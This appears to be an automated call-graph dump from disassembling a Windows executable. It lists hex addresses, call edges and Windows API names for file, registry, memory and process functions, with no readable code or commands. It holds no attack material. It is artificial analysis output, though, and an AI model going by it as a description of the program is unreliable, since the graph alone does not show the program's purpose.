99103->99107 99105->99102 99108 fdd703 __chsize_nolock 58 API calls 99105->99108 99106 fe0d99 99109 fe0dbb 99106->99109 99139 fd8d47 58 API calls 3 library calls 99106->99139 99110 fe0d66 99107->99110 99111 fe0d7b FindCloseChangeNotification 99108->99111 99109->99087 99113 fdd703 __chsize_nolock 58 API calls 99110->99113 99111->99102 99114 fe0d87 GetLastError 99111->99114 99113->99105 99114->99102 99115->99069 99116->99084 99117->99075 99118->99087 99119->99084 99120->99075 99121->99082 99122->99084 99123->99099 99124->99093 99126 fdd70e 99125->99126 99127 fdd723 99125->99127 99128 fd8d34 __chsize_nolock 58 API calls 99126->99128 99129 fd8d34 __chsize_nolock 58 API calls 99127->99129 99131 fdd748 99127->99131 99130 fdd713 99128->99130 99132 fdd752 99129->99132 99133 fd8d68 _W_expandtime 58 API calls 99130->99133 99131->99103 99134 fd8d68 _W_expandtime 58 API calls 99132->99134 99135 fdd71b 99133->99135 99136 fdd75a 99134->99136 99135->99103 99137 fd8ff6 _W_expandtime 9 API calls 99136->99137 99137->99135 99138->99106 99139->99109 99141 fd09e2 __ftell_nolock 99140->99141 99142 fd09f1 GetLongPathNameW 99141->99142 99143 fb7d2c 59 API calls 99142->99143 99144 fb741d 99143->99144 99145 fb716b 99144->99145 99146 fb77c7 59 API calls 99145->99146 99147 fb717d 99146->99147 99148 fb48ae 60 API calls 99147->99148 99149 fb7188 99148->99149 99150 feecae 99149->99150 99151 fb7193 99149->99151 99155 feecc8 99150->99155 99198 fb7a68 61 API calls 99150->99198 99152 fb3f84 59 API calls 99151->99152 99154 fb719f 99152->99154 99192 fb34c2 99154->99192 99157 fb71b2 Mailbox 99157->98156 99159 fb4f3d 136 API calls 99158->99159 99160 fb69ef 99159->99160 99161 fee45a 99160->99161 99162 fb4f3d 136 API calls 99160->99162 99163 10197e5 122 API calls 99161->99163 99164 fb6a03 99162->99164 99165 fee46f 99163->99165 99164->99161 99166 fb6a0b 99164->99166 99167 fee473 99165->99167 99168 fee490 99165->99168 99170 fee47b 99166->99170 99171 fb6a17 99166->99171 99172 fb4faa 84 API calls 99167->99172 99169 fd0ff6 Mailbox 59 API calls 99168->99169 99191 fee4d5 Mailbox 99169->99191 99306 1014534 90 API calls _wprintf 99170->99306 99199 fb6bec 99171->99199 99172->99170 99175 fee489 99175->99168 99177 fee689 99178 fd2f95 _free 58 API calls 99177->99178 99179 fee691 99178->99179 99180 fb4faa 84 API calls 99179->99180 99185 fee69a 99180->99185 99184 fd2f95 _free 58 API calls 99184->99185 99185->99184 99187 fb4faa 84 API calls 99185->99187 99310 100fcb1 89 API calls 4 library calls 99185->99310 99187->99185 99188 fb7f41 59 API calls 99188->99191 99191->99177 99191->99185 99191->99188 99292 fb766f 99191->99292 99300 fb74bd 99191->99300 99307 100fc4d 59 API calls 2 library calls 99191->99307 99308 100fb6e 61 API calls 2 library calls 99191->99308 99309 1017621 59 API calls Mailbox 99191->99309 99193 fb34d4 99192->99193 99197 fb34f3 _memmove 99192->99197 99195 fd0ff6 Mailbox 59 API calls 99193->99195 99194 fd0ff6 Mailbox 59 API calls 99196 fb350a 99194->99196 99195->99197 99196->99157 99197->99194 99198->99150 99200 fee847 99199->99200 99201 fb6c15 99199->99201 99402 100fcb1 89 API calls 4 library calls 99200->99402 99316 fb5906 60 API calls Mailbox 99201->99316 99204 fb6c37 99317 fb5956 99204->99317 99205 fee85a 99403 100fcb1 89 API calls 4 library calls 99205->99403 99208 fb6c54 99210 fb77c7 59 API calls 99208->99210 99212 fb6c60 99210->99212 99211 fee876 99213 fb6cc1 99211->99213 99330 fd0b9b 60 API calls __ftell_nolock 99212->99330 99215 fb6ccf 99213->99215 99216 fee889 99213->99216 99219 fb77c7 59 API calls 99215->99219 99218 fb5dcf CloseHandle 99216->99218 99217 fb6c6c 99220 fb77c7 59 API calls 99217->99220 99221 fee895 99218->99221 99222 fb6cd8 99219->99222 99223 fb6c78 99220->99223 99224 fb4f3d 136 API calls 99221->99224 99225 fb77c7 59 API calls 99222->99225 99226 fb48ae 60 API calls 99223->99226 99227 fee8b1 99224->99227 99228 fb6ce1 99225->99228 99229 fb6c86 99226->99229 99231 fee8da 99227->99231 99234 10197e5 122 API calls 99227->99234 99340 fb46f9 99228->99340 99331 fb59b0 ReadFile SetFilePointerEx 99229->99331 99404 100fcb1 89 API calls 4 library calls 99231->99404 99233 fb6cb2 99332 fb5c4e 99233->99332 99238 fee8cd 99234->99238 99241 fee8f6 99238->99241 99242 fee8d5 99238->99242 99240 fee8f1 99248 fb6e6c Mailbox 99240->99248 99245 fb4faa 84 API calls 99241->99245 99244 fb4faa 84 API calls 99242->99244 99244->99231 99246 fee8fb 99245->99246 99247 fd0ff6 Mailbox 59 API calls 99246->99247 99255 fee92f 99247->99255 99311 fb5934 99248->99311 99252 fb3bcd 99252->98023 99252->98045 99257 fb766f 59 API calls 99255->99257 99288 fee978 Mailbox 99257->99288 99261 feeb69 99409 1017581 59 API calls Mailbox 99261->99409 99265 feeb8b 99410 101f835 59 API calls 2 library calls 99265->99410 99268 feeb98 99269 fd2f95 _free 58 API calls 99268->99269 99269->99248 99274 fb766f 59 API calls 99274->99288 99282 fb7f41 59 API calls 99282->99288 99286 feebbb 99411 100fcb1 89 API calls 4 library calls 99286->99411 99288->99261 99288->99274 99288->99282 99288->99286 99405 100fc4d 59 API calls 2 library calls 99288->99405 99406 100fb6e 61 API calls 2 library calls 99288->99406 99407 1017621 59 API calls Mailbox 99288->99407 99408 fb7373 59 API calls Mailbox 99288->99408 99289 feebd4 99290 fd2f95 _free 58 API calls 99289->99290 99291 feebe7 99290->99291 99291->99248 99293 fb770f 99292->99293 99296 fb7682 _memmove 99292->99296 99295 fd0ff6 Mailbox 59 API calls 99293->99295 99294 fd0ff6 Mailbox 59 API calls 99297 fb7689 99294->99297 99295->99296 99296->99294 99298 fd0ff6 Mailbox 59 API calls 99297->99298 99299 fb76b2 99297->99299 99298->99299 99299->99191 99301 fb74d0 99300->99301 99304 fb757e 99300->99304 99302 fd0ff6 Mailbox 59 API calls 99301->99302 99305 fb7502 99301->99305 99302->99305 99303 fd0ff6 59 API calls Mailbox 99303->99305 99304->99191 99305->99303 99305->99304 99306->99175 99307->99191 99308->99191 99309->99191 99310->99185 99312 fb5dcf CloseHandle 99311->99312 99313 fb593c Mailbox 99312->99313 99314 fb5dcf CloseHandle 99313->99314 99315 fb594b 99314->99315 99315->99252 99316->99204 99318 fb5dcf CloseHandle 99317->99318 99319 fb5962 99318->99319 99414 fb5df9 99319->99414 99321 fb5981 99322 fb59a4 99321->99322 99422 fb5770 99321->99422 99322->99205 99322->99208 99324 fb5993 99439 fb53db SetFilePointerEx SetFilePointerEx 99324->99439 99326 fb599a 99326->99322 99327 fee030 99326->99327 99440 1013696 SetFilePointerEx SetFilePointerEx WriteFile 99327->99440 99329 fee060 99329->99322 99330->99217 99331->99233 99339 fb5c68 99332->99339 99333 fb5cef SetFilePointerEx 99453 fb5dae SetFilePointerEx 99333->99453 99334 fee151 99454 fb5dae SetFilePointerEx 99334->99454 99337 fb5cc3 99337->99213 99338 fee16b 99339->99333 99339->99334 99339->99337 99341 fb77c7 59 API calls 99340->99341 99342 fb470f 99341->99342 99343 fb77c7 59 API calls 99342->99343 99344 fb4717 99343->99344 99345 fb77c7 59 API calls 99344->99345 99346 fb471f 99345->99346 99347 fb77c7 59 API calls 99346->99347 99348 fb4727 99347->99348 99349 fb475b 99348->99349 99350 fed8fb 99348->99350 99351 fb79ab 59 API calls 99349->99351 99352 fb81a7 59 API calls 99350->99352 99353 fb4769 99351->99353 99354 fed904 99352->99354 99355 fb7e8c 59 API calls 99353->99355 99356 fb7eec 59 API calls 99354->99356 99357 fb4773 99355->99357 99359 fb479e 99356->99359 99358 fb79ab 59 API calls 99357->99358 99357->99359 99362 fb4794 99358->99362 99360 fb47de 99359->99360 99363 fb47bd 99359->99363 99373 fed924 99359->99373 99455 fb79ab 99360->99455 99365 fb7e8c 59 API calls 99362->99365 99367 fb7b52 59 API calls 99363->99367 99364 fb47ef 99365->99359 99366 fed9f4 99370 fb7d2c 59 API calls 99366->99370 99368 fb47c7 99367->99368 99368->99360 99374 fb79ab 59 API calls 99368->99374 99390 fed9b1 99370->99390 99373->99366 99376 fed9dd 99373->99376 99385 fed95b 99373->99385 99374->99360 99376->99366 99382 fed9c8 99376->99382 99380 fb7b52 59 API calls 99380->99390 99381 fed9b9 99383 fb7d2c 59 API calls 99381->99383 99384 fb7d2c 59 API calls 99382->99384 99383->99390 99384->99390 99385->99381 99388 fed9a4 99385->99388 99389 fb7d2c 59 API calls 99388->99389 99389->99390 99390->99360 99390->99380 99468 fb7a84 59 API calls 2 library calls 99390->99468 99402->99205 99403->99211 99404->99240 99405->99288 99406->99288 99407->99288 99408->99288 99409->99265 99410->99268 99411->99289 99415 fb5e12 CreateFileW 99414->99415 99416 fee181 99414->99416 99418 fb5e34 99415->99418 99417 fee187 CreateFileW 99416->99417 99416->99418 99417->99418 99419 fee1ad 99417->99419 99418->99321 99420 fb5c4e 2 API calls 99419->99420 99421 fee1b8 99420->99421 99421->99418 99423 fedfce 99422->99423 99424 fb578b 99422->99424 99438 fb581a 99423->99438 99447 fb5e3f 99423->99447 99425 fb5c4e 2 API calls 99424->99425 99424->99438 99426 fb57ad 99425->99426 99428 fb538e 59 API calls 99426->99428 99429 fb57b7 99428->99429 99429->99423 99430 fb57c4 99429->99430 99431 fd0ff6 Mailbox 59 API calls 99430->99431 99432 fb57cf 99431->99432 99433 fb538e 59 API calls 99432->99433 99434 fb57da 99433->99434 99441 fb5d20 99434->99441 99437 fb5c4e 2 API calls 99437->99438 99438->99324 99439->99326 99440->99329 99442 fb5d93 99441->99442 99446 fb5d2e 99441->99446 99452 fb5dae SetFilePointerEx 99442->99452 99444 fb5807 99444->99437 99445 fb5d66 ReadFile 99445->99444 99445->99446 99446->99444 99446->99445 99448 fb5c4e 2 API calls 99447->99448 99449 fb5e60 99448->99449 99450 fb5c4e 2 API calls 99449->99450 99451 fb5e74 99450->99451 99451->99438 99452->99446 99453->99337 99454->99338 99456 fb79ba 99455->99456 99457 fb7a17 99455->99457 99456->99457 99459 fb79c5 99456->99459 99458 fb7e8c 59 API calls 99457->99458 99465 fb79e8 _memmove 99458->99465 99460 fb79e0 99459->99460 99461 feef32 99459->99461 99463 fb8087 59 API calls 99460->99463 99462 fb8189 59 API calls 99461->99462 99463->99465 99465->99364 99468->99390 99470 fb7009 99469->99470 99471 fb6ef5 99469->99471 99470->98162 99471->99470 99472 fd0ff6 Mailbox 59 API calls 99471->99472 99474 fb6f1c 99472->99474 99473 fd0ff6 Mailbox 59 API calls 99474->99473 99970 fb1055 99975 fb2649 99970->99975 99973 fd2f80 __cinit 67 API calls 99974 fb1064 99973->99974 99976 fb77c7 59 API calls 99975->99976 99977 fb26b7 99976->99977 99982 fb3582 99977->99982 99980 fb2754 99981 fb105a 99980->99981 99985 fb3416 59 API calls 2 library calls 99980->99985 99981->99973 99986 fb35b0 99982->99986 99985->99980 99987 fb35a1 99986->99987 99988 fb35bd 99986->99988 99987->99980 99988->99987 99989 fb35c4 RegOpenKeyExW 99988->99989 99989->99987 99990 fb35de RegQueryValueExW 99989->99990 99991 fb35ff 99990->99991 99992 fb3614 RegCloseKey 99990->99992 99991->99992 99992->99987 99993 fbe70b 99996 fbd260 99993->99996 99995 fbe719 99997 fbd27d 99996->99997 99998 fbd4dd 99996->99998 99999 ff2abb 99997->99999 100000 ff2b0a 99997->100000 100029 fbd2a4 99997->100029 100011 fbd6ab 99998->100011 100045 101a0b5 89 API calls 4 library calls 99998->100045 100003 ff2abe 99999->100003 100004 ff2ad9 99999->100004 100040 102a6fb 331 API calls __cinit 100000->100040 100005 ff2aca 100003->100005 100003->100029 100004->99998 100039 102b1b7 331 API calls 3 library calls 100004->100039 100038 102ad0f 331 API calls 100005->100038 100006 fd2f80 __cinit 67 API calls 100006->100029 100009 fbd594 100032 fb8bb2 68 API calls 100009->100032 100010 ff2cdf 100010->100010 100011->99995 100015 fbd5a3 100015->99995 100016 ff2c26 100044 102aa66 89 API calls 100016->100044 100019 fb8620 69 API calls 100019->100029 100026 fba000 331 API calls 100026->100029 100027 fb81a7 59 API calls 100027->100029 100029->99998 100029->100006 100029->100009 100029->100011 100029->100016 100029->100019 100029->100026 100029->100027 100030 fb88a0 68 API calls __cinit 100029->100030 100031 fb86a2 68 API calls 100029->100031 100033 fb859a 68 API calls 100029->100033 100034 fbd0dc 331 API calls 100029->100034 100035 fb9f3a 59 API calls Mailbox 100029->100035 100036 fbd060 89 API calls 100029->100036 100037 fbcedd 331 API calls 100029->100037 100041 fb8bb2 68 API calls 100029->100041 100042 fb9e9c 60 API calls Mailbox 100029->100042 100043 1006d03 60 API calls 100029->100043 100030->100029 100031->100029 100032->100015 100033->100029 100034->100029 100035->100029 100036->100029 100037->100029 100038->100011 100039->99998 100040->100029 100041->100029 100042->100029 100043->100029 100044->99998 100045->100010 100046 fb568a 100053 fb5c18 100046->100053 100051 fb56ba Mailbox 100054 fd0ff6 Mailbox 59 API calls 100053->100054 100055 fb5c2b 100054->100055 100056 fd0ff6 Mailbox 59 API calls 100055->100056 100057 fb569c 100056->100057 100058 fb5632 100057->100058 100065 fb5a2f 100058->100065 100060 fb5674 100060->100051 100064 fb81c1 61 API calls Mailbox 100060->100064 100061 fb5d20 2 API calls 100062 fb5643 100061->100062 100062->100060 100062->100061 100072 fb5bda 59 API calls 2 library calls 100062->100072 100064->100051 100066 fee065 100065->100066 100067 fb5a40 100065->100067 100073 1006443 59 API calls Mailbox 100066->100073 100067->100062 100069 fee06f 100070 fd0ff6 Mailbox 59 API calls 100069->100070 100071 fee07b 100070->100071 100072->100062 100073->100069 100074 ff220e GetTempPathW 100075 ff222b 100074->100075 100076 fbb56e 100083 fcfb84 100076->100083 100078 fbb584 100092 fbc707 100078->100092 100080 fbb5ac 100082 fba4e8 100080->100082 100104 101a0b5 89 API calls 4 library calls 100080->100104 100084 fcfb90 100083->100084 100085 fcfba2 100083->100085 100105 fb9e9c 60 API calls Mailbox 100084->100105 100087 fcfba8 100085->100087 100088 fcfbd1 100085->100088 100089 fd0ff6 Mailbox 59 API calls 100087->100089 100106 fb9e9c 60 API calls Mailbox 100088->100106 100091 fcfb9a 100089->100091 100091->100078 100093 fb7b76 59 API calls 100092->100093 100094 fbc72c _wcscmp 100092->100094 100093->100094 100095 fb7f41 59 API calls 100094->100095 100098 fbc760 Mailbox 100094->100098 100096 ff1abb 100095->100096 100097 fb7c8e 59 API calls 100096->100097 100099 ff1ac6 100097->100099 100098->100080 100107 fb859a 68 API calls 100099->100107 100101 ff1ad7 100103 ff1adb Mailbox 100101->100103 100108 fb9e9c 60 API calls Mailbox 100101->100108 100103->100080 100104->100082 100105->100091 100106->100091 100107->100101 100108->100103 100109 feff06 100110 feff10 100109->100110 100139 fbac90 Mailbox _memmove 100109->100139 100359 fb8e34 59 API calls Mailbox 100110->100359 100115 fd0ff6 59 API calls Mailbox 100135 fba097 Mailbox 100115->100135 100118 fbb5d5 100122 fb81a7 59 API calls 100118->100122 100119 fba6ba 100367 101a0b5 89 API calls 4 library calls 100119->100367 100120 fbb5da 100369 101a0b5 89 API calls 4 library calls 100120->100369 100133 fba1b7 100122->100133 100123 ff047f 100363 101a0b5 89 API calls 4 library calls 100123->100363 100125 fb7f41 59 API calls 100125->100139 100127 fb81a7 59 API calls 100127->100135 100128 fbb685 100364 101a0b5 89 API calls 4 library calls 100128->100364 100129 fb77c7 59 API calls 100129->100135 100130 ff048e 100131 1007405 59 API calls 100131->100135 100134 10066f4 Mailbox 59 API calls 100134->100133 100135->100115 100135->100118 100135->100119 100135->100120 100135->100123 100135->100127 100135->100129 100135->100131 100135->100133 100136 ff0e00 100135->100136 100138 fd2f80 67 API calls __cinit 100135->100138 100353 fbca20 331 API calls 2 library calls 100135->100353 100354 fbba60 60 API calls Mailbox 100135->100354 100368 101a0b5 89 API calls 4 library calls 100136->100368 100138->100135 100139->100125 100139->100128 100139->100133 100139->100135 100140 102bf80 331 API calls 100139->100140 100142 fd0ff6 59 API calls Mailbox 100139->100142 100143 fbb416 100139->100143 100144 fba000 331 API calls 100139->100144 100146 ff0c94 100139->100146 100148 ff0ca2 100139->100148 100151 fbb37c 100139->100151 100158 fbade2 Mailbox 100139->100158 100312 102c5f4 100139->100312 100344 1017be0 100139->100344 100350 10066f4 100139->100350 100360 1007405 59 API calls 100139->100360 100361 102c4a7 85 API calls 2 library calls 100139->100361 100140->100139 100142->100139 100358 fbf803 331 API calls 100143->100358 100144->100139 100365 fb9df0 59 API calls Mailbox 100146->100365 100366 101a0b5 89 API calls 4 library calls 100148->100366 100150 ff0c86 100150->100133 100150->100134 100356 fb9e9c 60 API calls Mailbox 100151->100356 100153 fbb38d 100357 fb9e9c 60 API calls Mailbox 100153->100357 100158->100128 100158->100133 100158->100150 100159 ff00e0 VariantClear 100158->100159 100166 102474d 331 API calls 100158->100166 100167 101d2e5 100158->100167 100214 101d2e6 100158->100214 100261 fc2123 100158->100261 100301 102e237 100158->100301 100304 102e24b 100158->100304 100307 103251d 100158->100307 100355 fb9df0 59 API calls Mailbox 100158->100355 100362 1007405 59 API calls 100158->100362 100159->100158 100166->100158 100168 101d305 100167->100168 100169 101d310 100167->100169 100170 fb9c9c 59 API calls 100168->100170 100172 fb77c7 59 API calls 100169->100172 100212 101d3ea Mailbox 100169->100212 100170->100169 100171 fd0ff6 Mailbox 59 API calls 100173 101d433 100171->100173 100174 101d334 100172->100174 100175 101d43f 100173->100175 100371 fb5906 60 API calls Mailbox 100173->100371 100176 fb77c7 59 API calls 100174->100176 100179 fb9997 84 API calls 100175->100179 100178 101d33d 100176->100178 100181 fb9997 84 API calls 100178->100181 100180 101d457 100179->100180 100182 fb5956 67 API calls 100180->100182 100183 101d349 100181->100183 100184 101d466 100182->100184 100185 fb46f9 59 API calls 100183->100185 100186 101d46a GetLastError 100184->100186 100187 101d49e 100184->100187 100188 101d35e 100185->100188 100189 101d483 100186->100189 100191 101d500 100187->100191 100192 101d4c9 100187->100192 100190 fb7c8e 59 API calls 100188->100190 100208 101d3f3 Mailbox 100189->100208 100372 fb5a1a CloseHandle 100189->100372 100193 101d391 100190->100193 100195 fd0ff6 Mailbox 59 API calls 100191->100195 100194 fd0ff6 Mailbox 59 API calls 100192->100194 100196 101d3e3 100193->100196 100201 1013e73 3 API calls 100193->100201 100197 101d4ce 100194->100197 100199 101d505 100195->100199 100200 fb9c9c 59 API calls 100196->100200 100202 101d4df 100197->100202 100205 fb77c7 59 API calls 100197->100205 100206 fb77c7 59 API calls 100199->100206 100199->100208 100200->100212 100203 101d3a1 100201->100203 100373 101f835 59 API calls 2 library calls 100202->100373 100203->100196 100204 101d3a5 100203->100204 100207 fb7f41 59 API calls 100204->100207 100205->100202 100206->100208 100210 101d3b2 100207->100210 100208->100158 100370 1013c66 63 API calls Mailbox 100210->100370 100212->100171 100212->100208 100213 101d3bb Mailbox 100213->100196 100215 101d305 100214->100215 100216 101d310 100214->100216 100218 fb9c9c 59 API calls 100215->100218 100217 101d3ea Mailbox 100216->100217 100220 fb77c7 59 API calls 100216->100220 100219 fd0ff6 Mailbox 59 API calls 100217->100219 100258 101d3f3 Mailbox 100217->100258 100218->100216 100221 101d433 100219->100221 100222 101d334 100220->100222 100223 101d43f 100221->100223 100375 fb5906 60 API calls Mailbox 100221->100375 100224 fb77c7 59 API calls 100222->100224 100227 fb9997 84 API calls 100223->100227 100226 101d33d 100224->100226 100229 fb9997 84 API calls 100226->100229 100228 101d457 100227->100228 100230 fb5956 67 API calls 100228->100230 100231 101d349 100229->100231 100232 101d466 100230->100232 100233 fb46f9 59 API calls 100231->100233 100234 101d46a GetLastError 100232->100234 100235 101d49e 100232->100235 100236 101d35e 100233->100236 100237 101d483 100234->100237 100239 101d500 100235->100239 100240 101d4c9 100235->100240 100238 fb7c8e 59 API calls 100236->100238 100237->100258 100376 fb5a1a CloseHandle 100237->100376 100241 101d391 100238->100241 100243 fd0ff6 Mailbox 59 API calls 100239->100243 100242 fd0ff6 Mailbox 59 API calls 100240->100242 100244 101d3e3 100241->100244 100249 1013e73 3 API calls 100241->100249 100245 101d4ce 100242->100245 100247 101d505 100243->100247 100248 fb9c9c 59 API calls 100244->100248 100250 101d4df 100245->100250 100253 fb77c7 59 API calls 100245->100253 100254 fb77c7 59 API calls 100247->100254 100247->100258 100248->100217 100251 101d3a1 100249->100251 100377 101f835 59 API calls 2 library calls 100250->100377 100251->100244 100252 101d3a5 100251->100252 100255 fb7f41 59 API calls 100252->100255 100253->100250 100254->100258 100257 101d3b2 100255->100257 100374 1013c66 63 API calls Mailbox 100257->100374 100258->100158 100260 101d3bb Mailbox 100260->100244 100262 fb9bf8 59 API calls 100261->100262 100263 fc213b 100262->100263 100265 fd0ff6 Mailbox 59 API calls 100263->100265 100268 ff69af 100263->100268 100266 fc2154 100265->100266 100267 fc2164 100266->100267 100393 fb5906 60 API calls Mailbox 100266->100393 100271 fb9997 84 API calls 100267->100271 100269 fc2189 100268->100269 100397 101f7df 59 API calls 100268->100397 100273 fb9c9c 59 API calls 100269->100273 100277 fc2196 100269->100277 100272 fc2172 100271->100272 100275 fb5956 67 API calls 100272->100275 100274 ff69f7 100273->100274 100276 ff69ff 100274->100276 100274->100277 100278 fc2181 100275->100278 100279 fb9c9c 59 API calls 100276->100279 100280 fb5e3f 2 API calls 100277->100280 100278->100268 100278->100269 100396 fb5a1a CloseHandle 100278->100396 100282 fc219d 100279->100282 100280->100282 100283 fc21b7 100282->100283 100284 ff6a11 100282->100284 100285 fb77c7 59 API calls 100283->100285 100286 fd0ff6 Mailbox 59 API calls 100284->100286 100287 fc21bf 100285->100287 100288 ff6a17 100286->100288 100378 fb56d2 100287->100378 100290 ff6a2b 100288->100290 100398 fb59b0 ReadFile SetFilePointerEx 100288->100398 100295 ff6a2f _memmove 100290->100295 100399 101794e 59 API calls 2 library calls 100290->100399 100291 fc21ce 100291->100295 100394 fb9b9c 59 API calls Mailbox 100291->100394 100296 fc21e2 Mailbox 100297 fc221c 100296->100297 100298 fb5dcf CloseHandle 100296->100298 100297->100158 100299 fc2210 100298->100299 100299->100297 100395 fb5a1a CloseHandle 100299->100395 100403 102cdf1 100301->100403 100303 102e247 100303->100158 100305 102cdf1 130 API calls 100304->100305 100306 102e25b 100305->100306 100306->100158 100493 100f8f2 100307->100493 100309 1032529 100512 fb9b9c 59 API calls Mailbox 100309->100512 100311 1032545 Mailbox 100311->100158 100313 fb77c7 59 API calls 100312->100313 100314 102c608 100313->100314 100315 fb77c7 59 API calls 100314->100315 100316 102c610 100315->100316 100317 fb77c7 59 API calls 100316->100317 100318 102c618 100317->100318 100319 fb9997 84 API calls 100318->100319 100332 102c626 100319->100332 100320 fb7d2c 59 API calls 100320->100332 100321 102c80f 100322 102c83c Mailbox 100321->100322 100515 fb9b9c 59 API calls Mailbox 100321->100515 100322->100139 100324 102c7f6 100328 fb7e0b 59 API calls 100324->100328 100325 fb7a84 59 API calls 100325->100332 100326 102c811 100329 fb7e0b 59 API calls 100326->100329 100327 fb81a7 59 API calls 100327->100332 100330 102c803 100328->100330 100331 102c820 100329->100331 100334 fb7c8e 59 API calls 100330->100334 100335 fb7c8e 59 API calls 100331->100335 100332->100320 100332->100321 100332->100322 100332->100324 100332->100325 100332->100326 100332->100327 100333 fb7faf 59 API calls 100332->100333 100336 fb7faf 59 API calls 100332->100336 100341 fb9997 84 API calls 100332->100341 100342 fb7c8e 59 API calls 100332->100342 100343 fb7e0b 59 API calls 100332->100343 100337 102c6bd CharUpperBuffW 100333->100337 100334->100321 100335->100321 100338 102c77d CharUpperBuffW 100336->100338 100514 fb859a 68 API calls 100337->100514 100340 fbc707 69 API calls 100338->100340 100340->100332 100341->100332 100342->100332 100343->100332 100345 1017bec 100344->100345 100346 fd0ff6 Mailbox 59 API calls 100345->100346 100347 1017bfa 100346->100347 100348 1017c08 100347->100348 100349 fb77c7 59 API calls 100347->100349 100348->100139 100349->100348 100516 1006636 100350->100516 100352 1006702 100352->100139 100353->100135 100354->100135 100355->100158 100356->100153 100357->100143 100358->100128 100359->100139 100360->100139 100361->100139 100362->100158 100363->100130 100364->100150 100365->100150 100366->100150 100367->100133 100368->100120 100369->100133 100370->100213 100371->100175 100372->100208 100373->100208 100374->100260 100375->100223 100376->100258 100377->100258 100379 fb56dd 100378->100379 100380 fb5702 100378->100380 100379->100380 100382 fb56ec 100379->100382 100381 fb7eec 59 API calls 100380->100381 100385 101349a 100381->100385 100386 fb5c18 59 API calls 100382->100386 100383 10134c9 100383->100291 100385->100383 100400 1013436 ReadFile SetFilePointerEx 100385->100400 100401 fb7a84 59 API calls 2 library calls 100385->100401 100387 10135ba 100386->100387 100389 fb5632 61 API calls 100387->100389 100390 10135c8 100389->100390 100392 10135d8 Mailbox 100390->100392 100402 fb793a 61 API calls Mailbox 100390->100402 100392->100291 100393->100267 100394->100296 100395->100297 100396->100268 100397->100268 100398->100290 100399->100295 100400->100385 100401->100385 100402->100392 100404 fb9997 84 API calls 100403->100404 100405 102ce2e 100404->100405 100410 102ce75 Mailbox 100405->100410 100441 102dab9 100405->100441 100407 102d242 100480 102dbdc 92 API calls Mailbox 100407->100480 100410->100303 100411 102cec6 Mailbox 100411->100410 100414 fb9997 84 API calls 100411->100414 100428 102d0cd 100411->100428 100473 101f835 59 API calls 2 library calls 100411->100473 100474 102d2f3 61 API calls 2 library calls 100411->100474 100412 102d251 100413 102d0db 100412->100413 100415 102d25d 100412->100415 100454 102cc82 100413->100454 100414->100411 100415->100410 100420 102d114 100469 fd0e48 100420->100469 100423 102d147 100426 fb942e 59 API calls 100423->100426 100424 102d12e 100475 101a0b5 89 API calls 4 library calls 100424->100475 100429 102d153 100426->100429 100427 102d139 GetCurrentProcess TerminateProcess 100427->100423 100428->100407 100428->100413 100430 fb91b0 59 API calls 100429->100430 100431 102d169 100430->100431 100440 102d190 100431->100440 100476 fb8ea0 59 API calls Mailbox 100431->100476 100433 102d2b8 100433->100410 100437 102d2cc FreeLibrary 100433->100437 100434 102d17f 100477 102d95d 107 API calls _free 100434->100477 100437->100410 100440->100433 100478 fb8ea0 59 API calls Mailbox 100440->100478 100479 fb9e9c 60 API calls Mailbox 100440->100479 100481 102d95d 107 API calls _free 100440->100481 100442 fb7faf 59 API calls 100441->100442 100443 102dad4 CharLowerBuffW 100442->100443 100482 100f658 100443->100482 100447 fb77c7 59 API calls 100448 102db0d 100447->100448 100449 fb79ab 59 API calls 100448->100449 100450 102db24 100449->100450 100452 fb7e8c 59 API calls 100450->100452 100451 102db6c Mailbox 100451->100411 100453 102db30 Mailbox 100452->100453 100453->100451 100489 102d2f3 61 API calls 2 library calls 100453->100489 100455 102cc9d 100454->100455 100456 102ccf2 100454->100456 100457 fd0ff6 Mailbox 59 API calls 100455->100457 100460 102dd64 100456->100460 100459 102ccbf 100457->100459 100458 fd0ff6 Mailbox 59 API calls 100458->100459 100459->100456 100459->100458 100461 102df8d Mailbox 100460->100461 100468 102dd87 _strcat _wcscpy __wsetenvp 100460->100468 100461->100420 100462 fb9c9c 59 API calls 100462->100468 100463 fb9d46 59 API calls 100463->100468 100464 fb9cf8 59 API calls 100464->100468 100465 fd594c 58 API calls __crtLCMapStringA_stat 100465->100468 100466 fb9997 84 API calls 100466->100468 100468->100461 100468->100462 100468->100463 100468->100464 100468->100465 100468->100466 100492 1015b29 61 API calls 2 library calls 100468->100492 100470 fd0e5d 100469->100470 100471 fd0ef5 VirtualAlloc 100470->100471 100472 fd0ec3 100470->100472 100471->100472 100472->100423 100472->100424 100473->100411 100474->100411 100475->100427 100476->100434 100477->100440 100478->100440 100479->100440 100480->100412 100481->100440 100483 100f683 __wsetenvp 100482->100483 100484 100f6c2 100483->100484 100487 100f6b8 100483->100487 100488 100f769 100483->100488 100484->100447 100484->100453 100487->100484 100490 fb7a24 61 API calls 100487->100490 100488->100484 100491 fb7a24 61 API calls 100488->100491 100489->100451 100490->100487 100491->100488 100492->100468 100494 fb77c7 59 API calls 100493->100494 100495 100f905 100494->100495 100496 fb7b76 59 API calls 100495->100496 100497 100f919 100496->100497 100498 100f658 61 API calls 100497->100498 100507 100f93b 100497->100507 100499 100f935 100498->100499 100501 fb79ab 59 API calls 100499->100501 100499->100507 100500 100f658 61 API calls 100500->100507 100501->100507 100502 100f9b5 100504 fb79ab 59 API calls 100502->100504 100503 fb79ab 59 API calls 100503->100507 100506 100f9ce 100504->100506 100505 fb7c8e 59 API calls 100505->100507 100508 fb7c8e 59 API calls 100506->100508 100507->100500 100507->100502 100507->100503 100507->100505 100509 100f9da 100508->100509 100511 100f9e9 Mailbox 100509->100511 100513 fb80d7 59 API calls 2 library calls 100509->100513 100511->100309 100512->100311 100513->100511 100514->100332 100515->100322 100517 1006641 100516->100517 100518 100665e 100516->100518 100517->100518 100520 1006621 59 API calls Mailbox 100517->100520 100518->100352 100520->100517 100521 ff0226 100527 fbade2 Mailbox 100521->100527 100523 ff0c86 100524 10066f4 Mailbox 59 API calls 100523->100524 100525 ff0c8f 100524->100525 100527->100523 100527->100525 100528 ff00e0 VariantClear 100527->100528 100529 fbb6c1 100527->100529 100531 101d2e5 101 API calls 100527->100531 100532 102e237 130 API calls 100527->100532 100533 101d2e6 101 API calls 100527->100533 100534 102e24b 130 API calls 100527->100534 100535 103251d 62 API calls 100527->100535 100536 fc2123 95 API calls 100527->100536 100537 102474d 331 API calls 100527->100537 100538 fb9df0 59 API calls Mailbox 100527->100538 100539 1007405 59 API calls 100527->100539 100528->100527 100540 101a0b5 89 API calls 4 library calls 100529->100540 100531->100527 100532->100527 100533->100527 100534->100527 